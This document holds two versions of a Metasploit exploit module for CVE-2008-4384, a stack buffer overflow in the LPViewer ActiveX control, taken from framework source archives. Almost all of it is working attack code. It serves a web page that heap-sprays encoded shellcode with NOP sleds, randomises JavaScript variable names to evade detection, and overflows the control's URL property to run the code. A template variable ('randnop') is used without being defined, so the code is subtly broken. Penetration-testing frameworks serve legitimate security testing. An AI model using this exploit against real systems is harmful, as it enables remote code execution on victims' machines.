==> metasploit-framework_6.1.27.orig.tar.gz: metasploit-framework-6.1.27/modules/exploits/windows/browser/lpviewer_url.rb <==
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When
        sending an overly long string to the URL() property an attacker may be able to execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'MC' ],
      'References'     =>
        [
          [ 'CVE', '2008-4384' ],
          [ 'OSVDB', '48946' ],
          [ 'US-CERT-VU', '848873' ],
          [ 'BID', '31604' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'         => 1024,
          'BadChars'      => "\x00",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0C0C0C0C } ]
        ],
      'DisclosureDate' => '2008-10-06',
      'DefaultTarget'  => 0))
  end

  def autofilter
    false
  end

  def check_dependencies
    use_zlib
  end

  def on_request_uri(cli, request)
    # Re-generate the payload.
    return if ((p = regenerate_payload(cli)) == nil)

    # Encode the shellcode.
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Create some nops.
    nops    = Rex::Text.to_unescape(make_nops(4))

    # Set the return.
    ret     = Rex::Text.uri_encode([target.ret].pack('L'))

    # Randomize the javascript variable names.
    vname  = rand_text_alpha(rand(100) + 1)
    var_i  = rand_text_alpha(rand(30)  + 2)
    rand1  = rand_text_alpha(rand(100) + 1)
    rand2  = rand_text_alpha(rand(100) + 1)
    rand3  = rand_text_alpha(rand(100) + 1)
    rand4  = rand_text_alpha(rand(100) + 1)
    rand5  = rand_text_alpha(rand(100) + 1)
    rand6  = rand_text_alpha(rand(100) + 1)
    rand7  = rand_text_alpha(rand(100) + 1)
    rand8  = rand_text_alpha(rand(100) + 1)

    content = %Q|
  <html>
  <head>
    <script>
    try {
      var #{vname} = new ActiveXObject('LPViewer.LPViewer.1');
      var #{rand1} = unescape('#{shellcode}');
      var #{randnop} = "#{nops}";
      var #{rand2} = unescape(#{randnop});
      var #{rand3} = 20;
      var #{rand4} = #{rand3} + #{rand1}.length;
      while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
      var #{rand5} = #{rand2}.substring(0,#{rand4});
      var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
      while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
      var #{rand7} = new Array();
      for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
      var #{rand8} = "";
      for (#{var_i} = 0; #{var_i} < 1224; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
      #{vname}.URL = #{rand8};
      } catch( e ) { window.location = 'about:blank' ; }
    </script>
  </head>
  </html>
        |

    content = Rex::Text.randomize_space(content)

    print_status("Sending #{self.name}")

    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    handler(cli)
  end
end

==> metasploit-framework_6.4.71.orig.tar.gz: metasploit-framework-6.4.71/modules/exploits/windows/browser/lpviewer_url.rb <==
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When
          sending an overly long string to the URL() property an attacker may be able to execute arbitrary code.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'MC' ],
        'References' => [
          [ 'CVE', '2008-4384' ],
          [ 'OSVDB', '48946' ],
          [ 'US-CERT-VU', '848873' ],
          [ 'BID', '31604' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        'Payload' => {
          'Space' => 1024,
          'BadChars' => "\x00",
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0C0C0C0C } ]
        ],
        'DisclosureDate' => '2008-10-06',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  def autofilter
    false
  end

  def check_dependencies
    use_zlib
  end

  def on_request_uri(cli, request)
    # Re-generate the payload.
    return if ((p = regenerate_payload(cli)) == nil)

    # Encode the shellcode.
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Create some nops.
    nops = Rex::Text.to_unescape(make_nops(4))

    # Set the return.
    ret = Rex::Text.uri_encode([target.ret].pack('L'))

    # Randomize the javascript variable names.
    vname = rand_text_alpha(rand(100) + 1)
    var_i = rand_text_alpha(rand(30) + 2)
    rand1 = rand_text_alpha(rand(100) + 1)
    rand2 = rand_text_alpha(rand(100) + 1)
    rand3 = rand_text_alpha(rand(100) + 1)
    rand4 = rand_text_alpha(rand(100) + 1)
    rand5 = rand_text_alpha(rand(100) + 1)
    rand6 = rand_text_alpha(rand(100) + 1)
    rand7 = rand_text_alpha(rand(100) + 1)
    rand8 = rand_text_alpha(rand(100) + 1)

    content = %Q|
  <html>
  <head>
    <script>
    try {
      var #{vname} = new ActiveXObject('LPViewer.LPViewer.1');
      var #{rand1} = unescape('#{shellcode}');
      var #{randnop} = "#{nops}";
      var #{rand2} = unescape(#{randnop});
      var #{rand3} = 20;
      var #{rand4} = #{rand3} + #{rand1}.length;
      while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
      var #{rand5} = #{rand2}.substring(0,#{rand4});
      var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
      while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
      var #{rand7} = new Array();
      for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
      var #{rand8} = "";
      for (#{var_i} = 0; #{var_i} < 1224; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
      #{vname}.URL = #{rand8};
      } catch( e ) { window.location = 'about:blank' ; }
    </script>
  </head>
  </html>
        |

    content = Rex::Text.randomize_space(content)

    print_status("Sending #{self.name}")

    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    handler(cli)
  end
end
